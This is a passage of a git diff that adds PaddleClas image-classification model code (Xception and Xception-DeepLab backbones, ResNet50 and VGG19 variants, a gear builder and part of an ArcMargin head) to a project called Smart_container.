b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception.py new file mode 100644 index 0000000..2b84378 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception.py @@ -0,0 +1,377 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math +import sys + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "Xception41": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception41_pretrained.pdparams", + "Xception65": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception65_pretrained.pdparams", + "Xception71": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception71_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + bn_name = "bn_" + name + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + "_scale"), + bias_attr=ParamAttr(name=bn_name + "_offset"), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class SeparableConv(nn.Layer): + def __init__(self, input_channels, output_channels, stride=1, name=None): + super(SeparableConv, self).__init__() + + self._pointwise_conv = ConvBNLayer( + input_channels, 
output_channels, 1, name=name + "_sep") + self._depthwise_conv = ConvBNLayer( + output_channels, + output_channels, + 3, + stride=stride, + groups=output_channels, + name=name + "_dw") + + def forward(self, inputs): + x = self._pointwise_conv(inputs) + x = self._depthwise_conv(x) + return x + + +class EntryFlowBottleneckBlock(nn.Layer): + def __init__(self, + input_channels, + output_channels, + stride=2, + name=None, + relu_first=False): + super(EntryFlowBottleneckBlock, self).__init__() + self.relu_first = relu_first + + self._short = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=1, + stride=stride, + padding=0, + weight_attr=ParamAttr(name + "_branch1_weights"), + bias_attr=False) + self._conv1 = SeparableConv( + input_channels, + output_channels, + stride=1, + name=name + "_branch2a_weights") + self._conv2 = SeparableConv( + output_channels, + output_channels, + stride=1, + name=name + "_branch2b_weights") + self._pool = MaxPool2D(kernel_size=3, stride=stride, padding=1) + + def forward(self, inputs): + conv0 = inputs + short = self._short(inputs) + if self.relu_first: + conv0 = F.relu(conv0) + conv1 = self._conv1(conv0) + conv2 = F.relu(conv1) + conv2 = self._conv2(conv2) + pool = self._pool(conv2) + return paddle.add(x=short, y=pool) + + +class EntryFlow(nn.Layer): + def __init__(self, block_num=3): + super(EntryFlow, self).__init__() + + name = "entry_flow" + self.block_num = block_num + self._conv1 = ConvBNLayer( + 3, 32, 3, stride=2, act="relu", name=name + "_conv1") + self._conv2 = ConvBNLayer(32, 64, 3, act="relu", name=name + "_conv2") + if block_num == 3: + self._conv_0 = EntryFlowBottleneckBlock( + 64, 128, stride=2, name=name + "_0", relu_first=False) + self._conv_1 = EntryFlowBottleneckBlock( + 128, 256, stride=2, name=name + "_1", relu_first=True) + self._conv_2 = EntryFlowBottleneckBlock( + 256, 728, stride=2, name=name + "_2", relu_first=True) + elif block_num == 5: + self._conv_0 = EntryFlowBottleneckBlock( 
+ 64, 128, stride=2, name=name + "_0", relu_first=False) + self._conv_1 = EntryFlowBottleneckBlock( + 128, 256, stride=1, name=name + "_1", relu_first=True) + self._conv_2 = EntryFlowBottleneckBlock( + 256, 256, stride=2, name=name + "_2", relu_first=True) + self._conv_3 = EntryFlowBottleneckBlock( + 256, 728, stride=1, name=name + "_3", relu_first=True) + self._conv_4 = EntryFlowBottleneckBlock( + 728, 728, stride=2, name=name + "_4", relu_first=True) + else: + sys.exit(-1) + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + + if self.block_num == 3: + x = self._conv_0(x) + x = self._conv_1(x) + x = self._conv_2(x) + elif self.block_num == 5: + x = self._conv_0(x) + x = self._conv_1(x) + x = self._conv_2(x) + x = self._conv_3(x) + x = self._conv_4(x) + return x + + +class MiddleFlowBottleneckBlock(nn.Layer): + def __init__(self, input_channels, output_channels, name): + super(MiddleFlowBottleneckBlock, self).__init__() + + self._conv_0 = SeparableConv( + input_channels, + output_channels, + stride=1, + name=name + "_branch2a_weights") + self._conv_1 = SeparableConv( + output_channels, + output_channels, + stride=1, + name=name + "_branch2b_weights") + self._conv_2 = SeparableConv( + output_channels, + output_channels, + stride=1, + name=name + "_branch2c_weights") + + def forward(self, inputs): + conv0 = F.relu(inputs) + conv0 = self._conv_0(conv0) + conv1 = F.relu(conv0) + conv1 = self._conv_1(conv1) + conv2 = F.relu(conv1) + conv2 = self._conv_2(conv2) + return paddle.add(x=inputs, y=conv2) + + +class MiddleFlow(nn.Layer): + def __init__(self, block_num=8): + super(MiddleFlow, self).__init__() + + self.block_num = block_num + self._conv_0 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_0") + self._conv_1 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_1") + self._conv_2 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_2") + self._conv_3 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_3") + 
self._conv_4 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_4") + self._conv_5 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_5") + self._conv_6 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_6") + self._conv_7 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_7") + if block_num == 16: + self._conv_8 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_8") + self._conv_9 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_9") + self._conv_10 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_10") + self._conv_11 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_11") + self._conv_12 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_12") + self._conv_13 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_13") + self._conv_14 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_14") + self._conv_15 = MiddleFlowBottleneckBlock( + 728, 728, name="middle_flow_15") + + def forward(self, inputs): + x = self._conv_0(inputs) + x = self._conv_1(x) + x = self._conv_2(x) + x = self._conv_3(x) + x = self._conv_4(x) + x = self._conv_5(x) + x = self._conv_6(x) + x = self._conv_7(x) + if self.block_num == 16: + x = self._conv_8(x) + x = self._conv_9(x) + x = self._conv_10(x) + x = self._conv_11(x) + x = self._conv_12(x) + x = self._conv_13(x) + x = self._conv_14(x) + x = self._conv_15(x) + return x + + +class ExitFlowBottleneckBlock(nn.Layer): + def __init__(self, input_channels, output_channels1, output_channels2, + name): + super(ExitFlowBottleneckBlock, self).__init__() + + self._short = Conv2D( + in_channels=input_channels, + out_channels=output_channels2, + kernel_size=1, + stride=2, + padding=0, + weight_attr=ParamAttr(name + "_branch1_weights"), + bias_attr=False) + self._conv_1 = SeparableConv( + input_channels, + output_channels1, + stride=1, + name=name + "_branch2a_weights") + self._conv_2 = SeparableConv( + output_channels1, + output_channels2, + stride=1, + name=name + 
"_branch2b_weights") + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=1) + + def forward(self, inputs): + short = self._short(inputs) + conv0 = F.relu(inputs) + conv1 = self._conv_1(conv0) + conv2 = F.relu(conv1) + conv2 = self._conv_2(conv2) + pool = self._pool(conv2) + return paddle.add(x=short, y=pool) + + +class ExitFlow(nn.Layer): + def __init__(self, class_num): + super(ExitFlow, self).__init__() + + name = "exit_flow" + + self._conv_0 = ExitFlowBottleneckBlock( + 728, 728, 1024, name=name + "_1") + self._conv_1 = SeparableConv(1024, 1536, stride=1, name=name + "_2") + self._conv_2 = SeparableConv(1536, 2048, stride=1, name=name + "_3") + self._pool = AdaptiveAvgPool2D(1) + stdv = 1.0 / math.sqrt(2048 * 1.0) + self._out = Linear( + 2048, + class_num, + weight_attr=ParamAttr( + name="fc_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + conv0 = self._conv_0(inputs) + conv1 = self._conv_1(conv0) + conv1 = F.relu(conv1) + conv2 = self._conv_2(conv1) + conv2 = F.relu(conv2) + pool = self._pool(conv2) + pool = paddle.flatten(pool, start_axis=1, stop_axis=-1) + out = self._out(pool) + return out + + +class Xception(nn.Layer): + def __init__(self, + entry_flow_block_num=3, + middle_flow_block_num=8, + class_num=1000): + super(Xception, self).__init__() + self.entry_flow_block_num = entry_flow_block_num + self.middle_flow_block_num = middle_flow_block_num + self._entry_flow = EntryFlow(entry_flow_block_num) + self._middle_flow = MiddleFlow(middle_flow_block_num) + self._exit_flow = ExitFlow(class_num) + + def forward(self, inputs): + x = self._entry_flow(inputs) + x = self._middle_flow(x) + x = self._exit_flow(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, 
pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def Xception41(pretrained=False, use_ssld=False, **kwargs): + model = Xception(entry_flow_block_num=3, middle_flow_block_num=8, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception41"], use_ssld=use_ssld) + return model + + +def Xception65(pretrained=False, use_ssld=False, **kwargs): + model = Xception( + entry_flow_block_num=3, middle_flow_block_num=16, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception65"], use_ssld=use_ssld) + return model + + +def Xception71(pretrained=False, use_ssld=False, **kwargs): + model = Xception( + entry_flow_block_num=5, middle_flow_block_num=16, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["Xception71"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception_deeplab.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception_deeplab.py new file mode 100644 index 0000000..c52769b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception_deeplab.py @@ -0,0 +1,421 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "Xception41_deeplab": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception41_deeplab_pretrained.pdparams", + "Xception65_deeplab": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Xception65_deeplab_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +def check_data(data, number): + if type(data) == int: + return [data] * number + assert len(data) == number + return data + + +def check_stride(s, os): + if s <= os: + return True + else: + return False + + +def check_points(count, points): + if points is None: + return False + else: + if isinstance(points, list): + return (True if count in points else False) + else: + return (True if count == points else False) + + +def gen_bottleneck_params(backbone='xception_65'): + if backbone == 'xception_65': + bottleneck_params = { + "entry_flow": (3, [2, 2, 2], [128, 256, 728]), + "middle_flow": (16, 1, 728), + "exit_flow": (2, [2, 1], [[728, 1024, 1024], [1536, 1536, 2048]]) + } + elif backbone == 'xception_41': + bottleneck_params = { + "entry_flow": (3, [2, 2, 2], [128, 256, 728]), + "middle_flow": (8, 1, 728), + "exit_flow": (2, [2, 1], [[728, 1024, 1024], [1536, 1536, 2048]]) + } + elif backbone == 'xception_71': + bottleneck_params = { + "entry_flow": (5, [2, 1, 2, 1, 2], [128, 256, 256, 728, 728]), + "middle_flow": (16, 1, 728), + "exit_flow": (2, [2, 1], [[728, 1024, 1024], [1536, 1536, 2048]]) + } + else: + raise Exception( + "xception backbont only support xception_41/xception_65/xception_71" + ) + return bottleneck_params + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride=1, + 
padding=0, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=padding, + weight_attr=ParamAttr(name=name + "/weights"), + bias_attr=False) + self._bn = BatchNorm( + num_channels=output_channels, + act=act, + epsilon=1e-3, + momentum=0.99, + param_attr=ParamAttr(name=name + "/BatchNorm/gamma"), + bias_attr=ParamAttr(name=name + "/BatchNorm/beta"), + moving_mean_name=name + "/BatchNorm/moving_mean", + moving_variance_name=name + "/BatchNorm/moving_variance") + + def forward(self, inputs): + return self._bn(self._conv(inputs)) + + +class Seperate_Conv(nn.Layer): + def __init__(self, + input_channels, + output_channels, + stride, + filter, + dilation=1, + act=None, + name=None): + super(Seperate_Conv, self).__init__() + + self._conv1 = Conv2D( + in_channels=input_channels, + out_channels=input_channels, + kernel_size=filter, + stride=stride, + groups=input_channels, + padding=(filter) // 2 * dilation, + dilation=dilation, + weight_attr=ParamAttr(name=name + "/depthwise/weights"), + bias_attr=False) + self._bn1 = BatchNorm( + input_channels, + act=act, + epsilon=1e-3, + momentum=0.99, + param_attr=ParamAttr(name=name + "/depthwise/BatchNorm/gamma"), + bias_attr=ParamAttr(name=name + "/depthwise/BatchNorm/beta"), + moving_mean_name=name + "/depthwise/BatchNorm/moving_mean", + moving_variance_name=name + "/depthwise/BatchNorm/moving_variance") + self._conv2 = Conv2D( + input_channels, + output_channels, + 1, + stride=1, + groups=1, + padding=0, + weight_attr=ParamAttr(name=name + "/pointwise/weights"), + bias_attr=False) + self._bn2 = BatchNorm( + output_channels, + act=act, + epsilon=1e-3, + momentum=0.99, + param_attr=ParamAttr(name=name + "/pointwise/BatchNorm/gamma"), + bias_attr=ParamAttr(name=name + "/pointwise/BatchNorm/beta"), + moving_mean_name=name + "/pointwise/BatchNorm/moving_mean", + 
            moving_variance_name=name + "/pointwise/BatchNorm/moving_variance")

    def forward(self, inputs):
        # depthwise conv -> BN -> pointwise conv -> BN
        x = self._conv1(inputs)
        x = self._bn1(x)
        x = self._conv2(x)
        x = self._bn2(x)
        return x


class Xception_Block(nn.Layer):
    """One Xception block: three stacked separable convolutions plus an
    optional residual shortcut.

    When `activation_fn_in_separable_conv` is False the ReLUs are applied
    in forward() *before* each separable conv (pre-activation); otherwise
    the activation lives inside each Seperate_Conv (via its BatchNorm `act`).
    `skip_conv` selects a projected (1x1 ConvBN) shortcut vs. identity;
    `has_skip=False` disables the residual connection entirely.
    """

    def __init__(self,
                 input_channels,
                 output_channels,
                 strides=1,
                 filter_size=3,
                 dilation=1,
                 skip_conv=True,
                 has_skip=True,
                 activation_fn_in_separable_conv=False,
                 name=None):
        super(Xception_Block, self).__init__()

        # Scalar settings are broadcast to one value per separable conv.
        repeat_number = 3
        output_channels = check_data(output_channels, repeat_number)
        filter_size = check_data(filter_size, repeat_number)
        strides = check_data(strides, repeat_number)

        self.has_skip = has_skip
        self.skip_conv = skip_conv
        self.activation_fn_in_separable_conv = activation_fn_in_separable_conv
        if not activation_fn_in_separable_conv:
            self._conv1 = Seperate_Conv(
                input_channels,
                output_channels[0],
                stride=strides[0],
                filter=filter_size[0],
                dilation=dilation,
                name=name + "/separable_conv1")
            self._conv2 = Seperate_Conv(
                output_channels[0],
                output_channels[1],
                stride=strides[1],
                filter=filter_size[1],
                dilation=dilation,
                name=name + "/separable_conv2")
            self._conv3 = Seperate_Conv(
                output_channels[1],
                output_channels[2],
                stride=strides[2],
                filter=filter_size[2],
                dilation=dilation,
                name=name + "/separable_conv3")
        else:
            self._conv1 = Seperate_Conv(
                input_channels,
                output_channels[0],
                stride=strides[0],
                filter=filter_size[0],
                act="relu",
                dilation=dilation,
                name=name + "/separable_conv1")
            self._conv2 = Seperate_Conv(
                output_channels[0],
                output_channels[1],
                stride=strides[1],
                filter=filter_size[1],
                act="relu",
                dilation=dilation,
                name=name + "/separable_conv2")
            self._conv3 = Seperate_Conv(
                output_channels[1],
                output_channels[2],
                stride=strides[2],
                filter=filter_size[2],
                act="relu",
                dilation=dilation,
                name=name + "/separable_conv3")

        # Projected shortcut is only built when the residual path may change
        # channels/stride.
        if has_skip and skip_conv:
            self._short = ConvBNLayer(
                input_channels,
                output_channels[-1],
                1,
                stride=strides[-1],
                padding=0,
                name=name + "/shortcut")

    def forward(self, inputs):
        if not self.activation_fn_in_separable_conv:
            # Pre-activation ordering: ReLU before every separable conv.
            x = F.relu(inputs)
            x = self._conv1(x)
            x = F.relu(x)
            x = self._conv2(x)
            x = F.relu(x)
            x = self._conv3(x)
        else:
            x = self._conv1(inputs)
            x = self._conv2(x)
            x = self._conv3(x)
        if self.has_skip:
            if self.skip_conv:
                skip = self._short(inputs)
            else:
                skip = inputs
            return paddle.add(x, skip)
        else:
            return x


class XceptionDeeplab(nn.Layer):
    """DeepLab-flavoured (modified aligned) Xception backbone used here for
    classification; `backbone` selects xception_41/65/71."""

    def __init__(self, backbone, class_num=1000):
        super(XceptionDeeplab, self).__init__()

        bottleneck_params = gen_bottleneck_params(backbone)
        self.backbone = backbone

        # Stem: two 3x3 ConvBN layers, the first downsampling by 2.
        self._conv1 = ConvBNLayer(
            3,
            32,
            3,
            stride=2,
            padding=1,
            act="relu",
            name=self.backbone + "/entry_flow/conv1")
        self._conv2 = ConvBNLayer(
            32,
            64,
            3,
            stride=1,
            padding=1,
            act="relu",
            name=self.backbone + "/entry_flow/conv2")

        # ---- entry flow ----
        self.block_num = bottleneck_params["entry_flow"][0]
        self.strides = bottleneck_params["entry_flow"][1]
        self.chns = bottleneck_params["entry_flow"][2]
        self.strides = check_data(self.strides, self.block_num)
        self.chns = check_data(self.chns, self.block_num)

        self.entry_flow = []
        self.middle_flow = []

        # `s` accumulates the total downsampling so far; a block keeps its
        # configured stride only while `s` stays within `output_stride`.
        self.stride = 2
        self.output_stride = 32
        s = self.stride

        for i in range(self.block_num):
            stride = self.strides[i] if check_stride(s * self.strides[i],
                                                     self.output_stride) else 1
            # NOTE(review): the block is built with `self.stride` (still the
            # initial 2) rather than the capped `stride` computed above. The
            # two coincide for the shipped configs (output_stride=32, entry
            # strides all 2) — confirm before changing output_stride.
            xception_block = self.add_sublayer(
                self.backbone + "/entry_flow/block" + str(i + 1),
                Xception_Block(
                    input_channels=64 if i == 0 else self.chns[i - 1],
                    output_channels=self.chns[i],
                    strides=[1, 1, self.stride],
                    name=self.backbone + "/entry_flow/block" + str(i + 1)))
            self.entry_flow.append(xception_block)
            s = s * stride
        self.stride = s

        # ---- middle flow ----
        self.block_num = bottleneck_params["middle_flow"][0]
        self.strides = bottleneck_params["middle_flow"][1]
        self.chns =
bottleneck_params["middle_flow"][2]
        self.strides = check_data(self.strides, self.block_num)
        self.chns = check_data(self.chns, self.block_num)
        s = self.stride

        for i in range(self.block_num):
            stride = self.strides[i] if check_stride(s * self.strides[i],
                                                     self.output_stride) else 1
            # Middle-flow blocks keep 728 channels, identity shortcuts
            # (skip_conv=False) and nominal stride 1.
            xception_block = self.add_sublayer(
                self.backbone + "/middle_flow/block" + str(i + 1),
                Xception_Block(
                    input_channels=728,
                    output_channels=728,
                    strides=[1, 1, self.strides[i]],
                    skip_conv=False,
                    name=self.backbone + "/middle_flow/block" + str(i + 1)))
            self.middle_flow.append(xception_block)
            s = s * stride
        self.stride = s

        # ---- exit flow: two blocks; the second is dilated (rate 2), has no
        # shortcut, and keeps its ReLUs inside the separable convs ----
        self.block_num = bottleneck_params["exit_flow"][0]
        self.strides = bottleneck_params["exit_flow"][1]
        self.chns = bottleneck_params["exit_flow"][2]
        self.strides = check_data(self.strides, self.block_num)
        self.chns = check_data(self.chns, self.block_num)
        s = self.stride
        stride = self.strides[0] if check_stride(s * self.strides[0],
                                                 self.output_stride) else 1
        self._exit_flow_1 = Xception_Block(
            728,
            self.chns[0], [1, 1, stride],
            name=self.backbone + "/exit_flow/block1")
        s = s * stride
        stride = self.strides[1] if check_stride(s * self.strides[1],
                                                 self.output_stride) else 1
        self._exit_flow_2 = Xception_Block(
            self.chns[0][-1],
            self.chns[1], [1, 1, stride],
            dilation=2,
            has_skip=False,
            activation_fn_in_separable_conv=True,
            name=self.backbone + "/exit_flow/block2")
        s = s * stride

        self.stride = s

        # Classification head: dropout -> global average pool -> linear.
        self._drop = Dropout(p=0.5, mode="downscale_in_infer")
        self._pool = AdaptiveAvgPool2D(1)
        self._fc = Linear(
            self.chns[1][-1],
            class_num,
            weight_attr=ParamAttr(name="fc_weights"),
            bias_attr=ParamAttr(name="fc_bias"))

    def forward(self, inputs):
        x = self._conv1(inputs)
        x = self._conv2(x)
        for ef in self.entry_flow:
            x = ef(x)
        for mf in self.middle_flow:
            x = mf(x)
        x = self._exit_flow_1(x)
        x = self._exit_flow_2(x)
        x = self._drop(x)
        x = self._pool(x)
        # Drop the 1x1 spatial dims left by the global pool before the FC.
        x = paddle.squeeze(x,
axis=[2, 3])
        x = self._fc(x)
        return x


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Load weights according to `pretrained`: False -> skip, True ->
    download from `model_url`, str -> local checkpoint path.

    Raises:
        RuntimeError: for any other `pretrained` type.
    """
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def Xception41_deeplab(pretrained=False, use_ssld=False, **kwargs):
    # Factory for the 41-layer variant; see _load_pretrained for `pretrained`.
    model = XceptionDeeplab('xception_41', **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["Xception41_deeplab"], use_ssld=use_ssld)
    return model


def Xception65_deeplab(pretrained=False, use_ssld=False, **kwargs):
    # Factory for the 65-layer variant.
    model = XceptionDeeplab("xception_65", **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["Xception65_deeplab"], use_ssld=use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/__init__.py
new file mode 100644
index 0000000..34fcdeb
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/__init__.py
@@ -0,0 +1,2 @@
from .resnet_variant import ResNet50_last_stage_stride1
from .vgg_variant import VGG19Sigmoid
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/resnet_variant.py b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/resnet_variant.py
new file mode 100644
index 0000000..08042ad
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/resnet_variant.py
@@ -0,0 +1,23 @@
from paddle.nn import Conv2D
from ppcls.arch.backbone.legendary_models.resnet import ResNet50, MODEL_URLS, _load_pretrained

__all__ = ["ResNet50_last_stage_stride1"]


def ResNet50_last_stage_stride1(pretrained=False, use_ssld=False, **kwargs):
    # Rebuild the matched convs of the last stage with stride 1, copying the
    # remaining construction arguments from the existing layer.
    def replace_function(conv):
        new_conv = Conv2D(
            in_channels=conv._in_channels,
out_channels=conv._out_channels,
            kernel_size=conv._kernel_size,
            stride=1,
            padding=conv._padding,
            groups=conv._groups,
            bias_attr=conv._bias_attr)
        return new_conv

    # NOTE(review): "[4|6]" is a regex character class containing '4', '|'
    # and '6' (not alternation); it still matches conv2d_44 / conv2d_46 as
    # intended.
    match_re = "conv2d_4[4|6]"
    model = ResNet50(pretrained=False, use_ssld=use_ssld, **kwargs)
    model.replace_sub(match_re, replace_function, True)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet50"], use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/vgg_variant.py b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/vgg_variant.py
new file mode 100644
index 0000000..b73ad35
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/variant_models/vgg_variant.py
@@ -0,0 +1,28 @@
import paddle
from paddle.nn import Sigmoid
from ppcls.arch.backbone.legendary_models.vgg import VGG19

__all__ = ["VGG19Sigmoid"]


class SigmoidSuffix(paddle.nn.Layer):
    """Wrap an existing layer and apply a sigmoid to its output."""

    def __init__(self, origin_layer):
        super(SigmoidSuffix, self).__init__()
        self.origin_layer = origin_layer
        self.sigmoid = Sigmoid()

    def forward(self, input, res_dict=None, **kwargs):
        # Extra kwargs/res_dict are accepted for interface parity with the
        # layer being wrapped and are intentionally ignored.
        x = self.origin_layer(input)
        x = self.sigmoid(x)
        return x


def VGG19Sigmoid(pretrained=False, use_ssld=False, **kwargs):
    """VGG19 whose final linear layer's output is passed through a sigmoid."""
    def replace_function(origin_layer):
        new_layer = SigmoidSuffix(origin_layer)
        return new_layer

    match_re = "linear_2"
    model = VGG19(pretrained=pretrained, use_ssld=use_ssld, **kwargs)
    model.replace_sub(match_re, replace_function, True)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/__init__.py b/Smart_container/PaddleClas/ppcls/arch/gears/__init__.py
new file mode 100644
index 0000000..75ca41d
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/gears/__init__.py
@@ -0,0 +1,32 @@
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from .arcmargin import ArcMargin +from .cosmargin import CosMargin +from .circlemargin import CircleMargin +from .fc import FC +from .vehicle_neck import VehicleNeck + +__all__ = ['build_gear'] + + +def build_gear(config): + support_dict = [ + 'ArcMargin', 'CosMargin', 'CircleMargin', 'FC', 'VehicleNeck' + ] + module_name = config.pop('name') + assert module_name in support_dict, Exception( + 'head only support {}'.format(support_dict)) + module_class = eval(module_name)(**config) + return module_class diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/arcmargin.py b/Smart_container/PaddleClas/ppcls/arch/gears/arcmargin.py new file mode 100644 index 0000000..22cc76e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/arcmargin.py @@ -0,0 +1,72 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 

import paddle
import paddle.nn as nn
import math


class ArcMargin(nn.Layer):
    """Additive angular margin (ArcFace-style) classification head.

    During training with labels it returns scale * cos(theta + margin) on
    the target class and scale * cos(theta) elsewhere, where theta is the
    angle between the L2-normalised feature and class-weight vectors.
    """

    def __init__(self,
                 embedding_size,
                 class_num,
                 margin=0.5,
                 scale=80.0,
                 easy_margin=False):
        super().__init__()
        self.embedding_size = embedding_size
        self.class_num = class_num
        self.margin = margin
        self.scale = scale
        self.easy_margin = easy_margin
        # One weight column per class.
        self.weight = self.create_parameter(
            shape=[self.embedding_size, self.class_num],
            is_bias=False,
            default_initializer=paddle.nn.initializer.XavierNormal())

    def forward(self, input, label=None):
        # L2-normalise features (rows) and class weights (columns) so that
        # the matmul below yields cosine similarities.
        input_norm = paddle.sqrt(
            paddle.sum(paddle.square(input), axis=1, keepdim=True))
        input = paddle.divide(input, input_norm)

        weight_norm = paddle.sqrt(
            paddle.sum(paddle.square(self.weight), axis=0, keepdim=True))
        weight = paddle.divide(self.weight, weight_norm)

        cos = paddle.matmul(input, weight)
        # Inference path (or no label): plain cosine logits, no margin.
        if not self.training or label is None:
            return cos
        # cos(theta + m) via the angle-addition identity; the 1e-6 guards
        # the sqrt against tiny negative rounding errors.
        sin = paddle.sqrt(1.0 - paddle.square(cos) + 1e-6)
        cos_m = math.cos(self.margin)
        sin_m = math.sin(self.margin)
        phi = cos * cos_m - sin * sin_m

        th = math.cos(self.margin) * (-1)
        mm = math.sin(self.margin) * self.margin
        if self.easy_margin:
            # Apply the margin only where cos(theta) > 0.
            phi = self._paddle_where_more_than(cos, 0, phi, cos)
        else:
            # Outside the monotonic range fall back to a linear penalty.
            phi = self._paddle_where_more_than(cos, th, phi, cos - mm)

        one_hot = paddle.nn.functional.one_hot(label, self.class_num)
